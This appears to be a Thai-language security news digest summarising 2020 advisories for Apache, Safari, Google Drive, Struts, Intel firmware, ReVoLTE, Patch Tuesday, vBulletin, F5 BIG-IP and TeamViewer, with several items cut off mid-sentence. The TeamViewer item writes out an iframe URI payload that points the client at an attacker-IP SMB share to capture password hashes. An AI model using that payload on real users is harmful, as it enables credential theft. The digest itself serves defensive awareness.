Apache ออกประกาศแก้ไขช่องโหว่ต่างๆ บนซอฟต์แวร์เว็บเซิร์ฟเวอร์ของตนเอง เนื่องจากช่องโหว่เหล่านี้เปิดให้รันโค้ดอันตรายและอาจทำให้ผู้โจมตีทำเซิร์ฟเวอร์ล่ม หรือไม่สามารถให้บริการต่อได้ (Denial of Service)

ช่องโหว่ที่พบมี 3 รายการ CVE-2020-9490, CVE-2020-11984, CVE-2020-11993 ถูกค้นพบโดย Felix Wilhelm จาก Google Project Zero ทาง Apache Foundation ได้ทราบรายละเอียดจึงนำไปแก้ไขในเวอร์ชันล่าสุด (2.4.46)

ช่องโหว่แรก (CVE-2020-11984) เป็นปัญหาเกี่ยวกับช่องโหว่ในการรันโค้ดจากระยะไกลด้วยการทำ Buffer Overflow กับโมดูล "mod_uwsgi" ซึ่งอาจทำให้ผู้โจมตีสามารถเข้ามาดู, เปลี่ยนแปลงหรือลบข้อมูลได้ โดยขึ้นอยู่กับสิทธิที่เกี่ยวข้องกับแอปพลิเคชันที่ทำงานบนเซิร์ฟเวอร์
ส่วนช่องโหว่ที่สอง (CVE-2020-11993) เป็นช่องโหว่ที่เกิดขึ้นเมื่อเปิดใช้งานดีบั๊กในโมดูล "mod_http2" ช่องโหว่จะทำให้ log statement ที่ทำการบันทึกการเชื่อมต่อทำงานผิดพลาดและอาจส่งผลให้หน่วยความจำเกิดเสียหายเนื่องจากการใช้งาน log pool ร่วมกัน
ช่องโหว่รายการสุดท้าย (CVE-2020-9490) เป็นช่องโหว่ที่มีความรุนแรงที่สุดและยังอยู่ในโมดูล HTTP/2 ช่องโหว่จะทำให้ผู้โจมตีที่ใช้ Cache-Digest Header ที่ออกเเบบมาเป็นพิเศษทำการโจมตีในหน่วยความจำเพื่อทำให้หน่วยความจำเสียหายซึ่งนำไปสู่ความผิดพลาดและการปฏิเสธบริการ (DoS)
แนะนำให้ติดตั้งเวอร์ชันล่าสุดของซอฟต์แวร์เซิร์ฟเวอร์ Apache เพื่อป้องกันไม่ให้แฮกเกอร์เข้ามาควบคุมได้

ที่มา: thehackernews.

Pawel Wylecial ผู้เชี่ยวชาญด้านความปลอดภัยและผู้ก่อตั้งบริษัทรักษาความปลอดภัย REDTEAM.PL และ BlackOwlSec ได้เปิดเผยถึงรายละเอียดของช่องโหว่ที่ยังไม่ได้รับการเเพตซ์ในเว็บเบราว์เซอร์ Safari ของ Apple ซึ่งจะทำให้ผู้โจมตีสามารถขโมยไฟล์จากระบบของเป้าหมายได้

Wylecial กล่าวว่าช่องโหว่เกิดจาก Web Share API ซึ่งโดยทั่วไปจะอนุญาตให้ผู้ใช้แชร์ลิงก์จาก Safari ผ่านแอพ third-party เช่นอีเมลและแอปที่ใช้ส่งข้อความ ในเชิงเทคนิคนั้น ช่องโหว่เกิดจากปัญหาเมื่อมีการเรียกใช้ scheme file:/// โดยลิงก์จะถูกส่งไปยังฟังก์ชัน navigator.

Nikoci นักวิจัยด้านความปลอดภัยได้เปิดเผยช่องโหว่ใน Google Drive ที่สามารถทำให้ผู้โจมตีหลอกให้ผู้ใช้งานติดตั้งมัลแวร์ได้ หลังพบผู้ใช้ได้รับผลกระทบจากการดาวน์โหลดไฟล์ที่มีมัลแวร์ซ่อนอยู่

ช่องโหว่ของ Google Drive ซึ่งยังไม่ได้รับการแก้ไขนั้นทำให้ผู้โจมตีสามารถเผยแพร่มัลแวร์ผ่าน Google Drive โดยผู้ประสงค์ร้ายสามารถใช้เมนู "Manage versions" โดยมีขั้นตอนเพียงแค่ทำการอัปโหลดไฟล์ปกติลงบน Google Drive ก่อนและหลังจากนั้นทำการอัปเดตไฟล์ใหม่ด้วยไฟล์ที่เป็นอันตรายที่มีชื่อเดียวกันเเทนไฟล์ที่ทำการอัปโหลดครั้งเเรกผ่าน "Manage versions"

จุดอ่อนของฟีเจอร์นี้อยู่ในข้อเท็จจริงที่ Google Drive จะไม่ตรวจสอบว่าไฟล์ที่อัปโหลดไปใหม่นั้นเป็นไฟล์ชนิดเดียวกันหรือไม่ ทำให้ผู้โจมตีสามารถซ่อนมัลแวร์ได้อย่างแนบเนียนและทำการกระจายมัลแวร์ไปสู่เป้าหมาย โดยช่องโหว่นี้แฮกเกอร์สามารถปรับใช้เทคนิค Spear-phishing attack เพื่อหลอกผู้ใช้ให้ทำการดาวน์โหลดและติดตั้งซอฟเเวร์ผ่านทาง Google Drive โดยไฟล์ดังกล่าวอาจเป็นไฟล์ที่่มีมัลแวร์ซ่อนอยู่

ปัจจุบัน Google ยังไม่ได้แก้ปัญหานี้ ในขณะเดียวกันเว็บเบราว์เซอร์อย่าง Google Chrome ก็มักจะเชื่อถือไฟล์ที่ดาวน์โหลดจาก Google Drive แม้ว่าไฟล์จะถูกตรวจพบโดยซอฟต์แวร์ Antivirus ตัวอื่นๆ ว่าเป็นอันตรายก็ตาม

คำแนะนำ: ก่อนที่จะดาวน์โหลดไฟล์ควรตรวจสอบที่มาของไฟล์ก่อนโหลด ทั้งนี้ควรทำการสแกนและอัปเดตฐานข้อมูล Antivirus อยู่เสมอเพื่อป้องกันมัลแวร์ที่อาจถูกซ่อนอยู่ในไฟล์

ที่มา: thehackernews.

หน่วยงาน Cybersecurity and Infrastructure Security Agency (CISA) ได้ออกคำเเนะนำและเเจ้งเตือนให้ผู้ดูเเลระบบและผู้ใช้ Apache Struts 2 ให้ทำการอัปเดตเเพตซ์เพื่อเเก้ไขช่องโหว่หลังพบว่ามีผู้ปล่อย PoC ของช่องโหว่ลง GitHub

ช่องโหว่ที่สำคัญและได้คำเเนะนำให้รีบอัปเดตเเพตซ์คือ CVE-2019-0230 และ CVE-2019-0233 มีผลกระทบกับ Apache Struts เวอร์ชัน 2.0.0 ถึง 2.5.20

ช่องโหว่ CVE-2019-0230 เป็นช่องโหว่ที่เกิดจากการการประมวลผลแท็กภายในแอตทริบิวต์ของ Object-Graph Navigation Language (OGNL) เมื่อ Struts พยายามทำการประมวลผลแท็กอินพุตภายในแอตทริบิวต์ ช่องโหว่จะทำส่งผลให้ผู้โจมตีที่ส่ง OGNL ที่เป็นอันตรายสามารถเรียกใช้โค้ดจากระยะไกล ช่องโหว่นี้ถูกค้นพบโดย Matthias Kaiser จาก Apple Information Security

ช่องโหว่ CVE-2019-0233 เป็นช่องโหว่ในการเเก้ไขสิทธิ์ในการเข้าถึงไฟล์ในระหว่างการอัปโหลดไฟล์ ซึ่งอาจส่งผลให้ผู้โจมตีสามารถแก้ไขคำขอระหว่างการดำเนินการอัปโหลดไฟล์ การดำเนินการในลักษณะนี้จะส่งผลให้ไฟล์ที่ทำการอัปโหลดล้มเหลว เมื่อเกิดความพยายามทำหลายๆ ครั้งอาจส่งผลให้เกิดการปฏิเสธเงื่อนไขการให้บริการหรือ Denial of service (DoS) ช่องโหว่นี้ถูกค้นพบโดย Takeshi Terada จาก Mitsui Bussan Secure Directions, Inc

CISA ได้ออกคำเเนะนำให้ผู้ดูเเลระบบและผู้ใช้ Apache Struts 2 ให้รีบทำการอัปเดตเเพตซ์ให้เป็น Apache Struts เวอร์ชั่น 2.5.22 เพื่อเเก้ไขช่องโหว่ดังกล่าวและป้องกันผู้ประสงค์ร้ายใช้ประโยชน์จาก PoC ของช่องโหว่ที่ถูกเปิดภายใน GitHub ทำการโจมตีระบบ

ที่มา:

us-cert.

Intel เเจ้งเตือนถึงช่องโหว่ที่อาจส่งผลกระทบต่อเมนบอร์ด Server System และ Compute Module ซึ่งช่องโหว่อาจทำให้ผู้โจมตีระยะไกลที่ไม่ได้รับการพิสูจน์ตัวตนสามารถยกระดับสิทธิ์ในระบบ

ช่องโหว่ CVE-2020-8708 (CVSS: 9.6/10) ถูกค้นพบโดย Dmytro Oleksiuk เป็นช่องโหว่ที่อยู่ในเฟิร์มแวร์ Emulex Pilot 3 ซึ่งเป็นซอฟต์แวร์ Baseboard-Management ที่มีหน้าที่ในการจัดการการควบคุมการทำงานของฮาร์ดแวร์เพื่อการมอนิเตอร์และตั้งค่าต่างๆ ซึ่งถูกใช้ในการมินิเตอร์ระบบเครือข่ายและอุปกรณ์เชื่อมต่อฮาร์ดแวร์ ช่องโหว่เกิดจากการตรวจสอบสิทธิ์ที่ไม่เหมาะสมทำให้ผู้โจมตีสามารถเข้าถึงคอนโซล KVM ของเซิร์ฟเวอร์ได้ นอกเหนือจากช่องโหว่ที่กล่าวมานั้น Intel ยังได้ทำการเเก้ไขช่องโหว่อีกจำนวน 22 รายการ

ช่องโหว่ส่งผลกระทบกับเซิร์ฟเวอร์ตระกูล R1000WT, R2000WT, ตระกูล R1000SP, LSVRP, LR1304SP และตระกูล R1000WF, R2000WF ผลกระทบในส่วนของเมนบอร์ดคือตระกูล S2600WT, S2600CW, S2600KP, S2600TP, S1200SP, S2600WF, S2600ST และตระกูล S2600BP นอกจากนี้ช่องโหว่ยังกระทบ Compute Modules ตระกูล HNS2600KP, HNS2600TP, HNS2600BP ของ Intel

Intel ได้แนะนำให้ผู้ใช้ทำการอัปเดตเฟิร์มแวร์เป็นเวอร์ชันล่าสุดเพื่อป้องกันการโจมตีและหาประโยชน์จากระบบผู้ดูแลและผู้ใช้งานสามารถอัปเดตเฟิร์มแวร์เป็นเวอร์ชันล่าสุด ซึ่งสามารถดาวน์โหลดได้จากตารางการอัปเดตนี้: https://www.

ทีมนักวิจัยจากมหาวิทยาลัย Ruhr ประเทศเยอรมนี ได้ออกมาเปิดเผยผลการวิจัยใหม่ซึ่งบ่งชี้ให้เห็นถึงข้อบกพร่องในการใช้งาน 4G LTE ในผู้ให้บริการภายใต้ชื่อ ReVoLTE ส่งผลให้ผู้โจมตีสามารถดักฟังการใช้งานได้

4G LTE เป็นมาตรฐานด้านการสื่อสารที่ใช้กันอยู่ทั่วไปในปัจจุบันโดยมี Voice over LTE หรือ VoLTE เป็นอีกเทคโนโลยีหนึ่งบน 4G LTE ซึ่งทำหน้าที่ในการรับส่งข้อมูลประเภทเสียง ตามมาตรฐานของ VoLTE นั้น การใช้งาน VoLTE สามารถทำแบบเข้ารหัสได้โดยที่ผู้ให้บริการเป็นผู้เลือกกุญแจในเข้ารหัสให้แตกต่างกันในแต่ละการใช้งาน จากนั้นนำไปเข้ารหัสด้วย stream cipher

ReVoLTE เป็นข้อบกพร่องที่เกิดจากการที่ผู้ให้บริการไม่ได้มีการเปลี่ยนกุญแจในการเข้ารหัส และใช้กุญแจเข้ารหัสเดิมในการเข้ารหัสซ้ำในแต่ละการใช้งาน ด้วยจุดอ่อนโดยทั่วไปของวิธีการเข้ารหัสแบบ stream cipher ปัญหาของการใช้กุญแจเข้ารหัสซ้ำจะส่งผลให้ผู้โจมตีสามารถทำการแกะกุญแจถอดรหัสออกมาได้โดยเปรียบเทียบข้อมูลที่ถูกเข้ารหัสด้วยกุญแจเดียวกัน ผู้โจมตีสามารถสร้างการโจมตีได้โดยการโทรหาเหยื่อและทำการบันทึกการสนทนาเอาไว้ 2 รอบจาก base station เดิม ยิ่งมีการบันทึกข้อมูลมากเท่าไหร่จะยิ่งมีโอกาสในการโจมตีสำเร็จที่มากขึ้น

หากใครคุ้นเคยกับช่องโหว่ในลักษณะนี้ มันข้อบกพร่องในลักษณะที่ใกล้เคียงกับมาตรฐาน WEP ในเครือข่าย Wireless ที่เกิดจากปัญหาของค่า IV ที่ทำให้แฮกเกอร์สามารถแกะคีย์ที่ใช้ใน RC4 ได้

นักวิจัยให้ข้อมูลเพิ่มเติมว่า อุปกรณ์ที่จำเป็นต่อการทำให้การโจมตีนี้สำหรับนั้นมีมูลค่าประมาณ 7000 ดอลลาร์ ซึ่งอยู่ในระดับเดียวกับที่รัฐบาลและหน่วยงานความมั่นคงใช้เพื่อซื้ออุปกรณ์ดักฟังรูปแบบอื่น โดยนักวิจัยยังมีการปล่อยแอปเพื่อตรวจสอบช่องโหว่นี้ให้กับผู้ใช้งานทั่วไปด้วยที่ https://github.

ไมโครซอฟต์ประกาศ Patch Tuesday ประจำเดือนสิงหาคม 2020 แล้ว โดยในเดือนนี้นั้นมี 120 ช่องโหว่ที่ได้รับการแพตช์ มีช่องโหว่ระดับวิกฤติอยู่ทั้งสิ้น 17 ช่องโหว่ ครอบคลุมกลุ่มผลิตภัณฑ์ Microsoft Edge, Windows, SQL Server และ .NET Framework

จากช่องโหว่ที่ได้รับการแพตช์ในรอบนี้นั้น ไมโครซอฟต์รายงานถึงการใช้ช่องโหว่เพื่อโจมตีแล้ว 2 ช่องโหว่ได้แก่ CVE-2020-1380 (CVSSv3 7.5) ซึ่งเป็นช่องโหว่ RCE ใน Scripting Engine กระทบกับ Internet Explorer 11 และช่องโหว่ CVE-2020-1464 (CVSSv3 5.3/10) ซึ่งเป็นช่องโหว่ในกระบวนการตรวจสอบ digital signature ของ Windows โดยนักวิจัยจาก Kaspersky ซึ่งค้นพบการใช้ช่องโหว่นี้เชื่อว่าผู้อยู่เบื้องหลังการใช้ช่องโหว่นี้มีเป้าหมายโจมตีบริษัทในเกาหลีใต้

ไอ-ซีเคียวขอแนะนำให้ผู้ใช้งานและผู้ดูแลระบบดำเนินการอัปเดตแพตช์ให้เป็นรุ่นล่าสุดโดยด่วนเพื่อลดความเสี่ยงที่จะถูกโจมตีโดยผู้ไม่ประสงค์ดี

ที่มา:

bleepingcomputer.

นักวิจัยด้านความปลอดภัย Amir Etemadieh จาก Austin-based ได้ทำการเผยแพร่รายละเอียดทางเทคนิคและโค้ด Proof-of-Concept (PoC) สำหรับช่องโหว่ Zero-day การเรียกใช้รหัสระยะไกลใน vBulletin

ช่องโหว่ที่ได้รับการเปิดเผยนี้เป็นช่องโหว่ใหม่ใช้สำหรับทำการ Bypass เเพตซ์ความปลอดภัยช่องโหว่ CVE-2019-16759 ที่ได้รับการเปิดเผยมาแล้วในเดือนกันยายน 2019 ซึ่งช่องโหว่ CVE-2019-16759 จะอนุญาตให้ผู้โจมตีใช้ประโยชน์จากจุดบกพร่องในระบบเทมเพลตของ vBulletin เพื่อเรียกใช้โค้ดที่เป็นอันตรายและเข้ายึดฟอรั่มโดยไม่จำเป็นต้องตรวจสอบสิทธิ์และได้รับการเเพตซ์เเก้ไขช่องโหว่ไปแล้ว

Etemadieh อธิบายว่าช่องโหว่ที่เขาได้ทำการเผยเเพร่ต่อสาธารณะนี้เกิดจากการล้มเหลวและการเเก้ไขช่องโหว่ไม่ถูกจุดของ vBulletin และใช้เวลาในการเเก้ไขช่องโหว่นี้นานกว่าหนึ่งปี สิ่งนี้จึงทำให้เขารู้สึกการเปิดเผยข้อมูลทั้งหมดเป็นทางออกที่ดีเพื่อจะช่วยให้เร่งสู่การเเก้ไข ซึ่ง PoC ที่ได้รับเปิดเผยนี้จะกระทบกับ vBulletin เวอร์ชั่นก่อน 5.6.2

ทีมงาน vBulletin ได้เเนะนำให้ผู้ใช้งานและผู้ดูแลระบบควรรีบทำการอัปเกรด vBulletin เป็นเวอร์ชั่น 5.6.2 โดยเร็วที่สุดเพื่อป้องกันการใช้ประโยชน์จาก PoC ที่ถูกเปิดเผยทำการโจมตีระบบ ส่วนสำหรับผู้ดูแลที่ไม่สามารถทำการอัปเกรด vBulletin ได้ในขณะนี้ให้ทำการบรรเทาการใช้ช่องโหว่โดยการตั้งค่าดังนี้

ไปที่ vBulletin administrator control panel
คลิก "Setting" ในเมนูทางด้านซ้ายจากนั้นคลิก "Option" ในเมนู Drop down
จากนั้นเลือก “General Setting” จากนั้นคลิก “Edit Setting”
จากนั้นมองหา “Disable PHP, Static HTML และ Ad Module rendering” ให้ทำการเซตเป็น “Yes”
กด “Save”

ที่มา:

bleepingcomputer.

FBI ออกแจ้งเตือนภัยถึงกลุ่มเเฮกเกอร์ชาวอิหร่านพยายามใช้ประโยชน์จากช่องโหว่ CVE-2020-5902 (F5 BIG-IP) ทำการโจมตีระบบ

FBI ได้ออกประกาศ Private Industry Notification (PIN) เพื่อเเจ้งเตือนถึงกลุ่มแฮกเกอร์ชาวอิหร่านพยายามใช้ประโยชน์จากข้อบกพร่องในช่องโหว่ CVE-2020-5902 ที่มีคะเเนนความรุนเเรงของช่องโหว่ CVSS: 10/10 โดยช่องโหว่ทำให้ผู้โจมตีสามารถเรียกใช้โค้ดจากระยะไกลโดยไม่ผ่านการตรวจสอบความถูกต้องและช่องโหว่จะส่งผลต่ออุปกรณ์ F5 Big-IP Application Delivery Controller (ADC)

FBI กล่าวว่ากลุ่มแฮกเกอร์ชาวอิหร่านถูกตรวจพบว่ามีการพยายามโจมตีภาคเอกชนและรัฐบาลของสหรัฐฯ โดยใช้ประโยชน์จากช่องโหว่ที่ถูกพบตั้งแต่ต้นเดือนกรกฎาคม 2563 ทำการโจมตีอุปกรณ์ Big-IP ADC ที่ไม่ได้รับการอัปเดตเเพตซ์การติดตั้ง

FBI ยังกล่าวอีกว่าหลังจากกลุ่มแฮกเกอร์ทำการบุกรุกสำเร็จพวกเขาจะใช้ Webshell, Mimikatz, NMAP และเครื่องมืออื่นๆ เพื่อทำการหาประโยชน์และทำการบุกรุกภายในเครือข่ายรวมถึงการปรับใช้ช่องโหว่ร่วมกับ Ransomware ในการโจมตีภายในเครือข่าย

FBI ได้ขอแนะนำผู้ดูแลระบบรีบทำการเเพตซ์ช่องโหว่ดังกล่าวให้เร็วที่สุดเพื่อป้องกันการโจมตีโดยใช้ประโยชน์จากช่องโหว่ ทั้งนี้ F5 มีสคริปชื่อ CVE-2020-5902 Detection Tool สำหรับแสกนหา IoCs ในระบบ ว่าถูกโจมตีแล้วหรือยัง ซึ่งสามารถเข้าไปดาวน์โหลดได้ที่: https://github.

TeamViewer ได้ออกเเพตซ์เเก้ไขช่องโหว่ที่อาจทำให้ผู้โจมตีสามารถเชี่อมต่อคอมพิวเตอร์ของผู้ใช้ได้ ซึ่งเมื่อโจมตีสำเร็จ ผู้โจมตีที่ไม่ได้เข้าสู่ระบบจะสามารถรันโค้ดได้จากระยะไกล หรือเพื่อดึงแฮชรหัสผ่านได้ โดยช่องโหว่นี้ถูกเปิดเผยโดย Jeffrey Hofmann วิศวกรด้านการรักษาความปลอดภัยจาก Praetorian

ช่องโหว่ CVE-2020-13699 จัดเป็นช่องโหว่ในประเภท Unquoted Search Path or Element (CWE-428) โดยช่องโหว่ประเภทนี้เกิดเนื่องจากการที่โปรแกรมรับค่า input มาโดยไม่ได้จัดการให้ดี เช่น ไม่มีเครื่องหมาย quoted (“) ครอบ ทำให้โปรแกรมแปลความหลายค่า input ที่ได้รับผิดพลาด มองค่า input ที่ได้รับเป็นคำสั่งของโปรแกรม ทำให้ผู้โจมตีสามารถใส่คำสั่งอันตรายลงไปใน input เพื่อให้โปรแกรมรันคำสั่งอันตรายได้

ผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้โดยทำการฝั่ง iframe ที่เป็นอันตรายในเว็บไซต์ที่ผู้โจมตีสร้างขึ้น โดยถ้าหากผู้ใช้ TeamViewer คลิกลิงก์ที่อยู่ภายในเว็บไซต์ที่เป็นอันตรายนี้ โค้ดจาก iframe ที่ผู้โจมตีฝั่งไว้จะทำงาน ซึ่งผู้โจมตีสามารถระบุให้แอปพลิเคชัน TeamViewer ที่ติดตั้งในเครื่องให้ทำการเชื่อมต่อกับเซิร์ฟเวอร์ของผู้โจมตีผ่านโปรโตคอล Server Message Block (SMB) ได้จากการใส่คำสั่งใน iframe ว่า teamviewer10: --play \\attacker-IP\share\fake.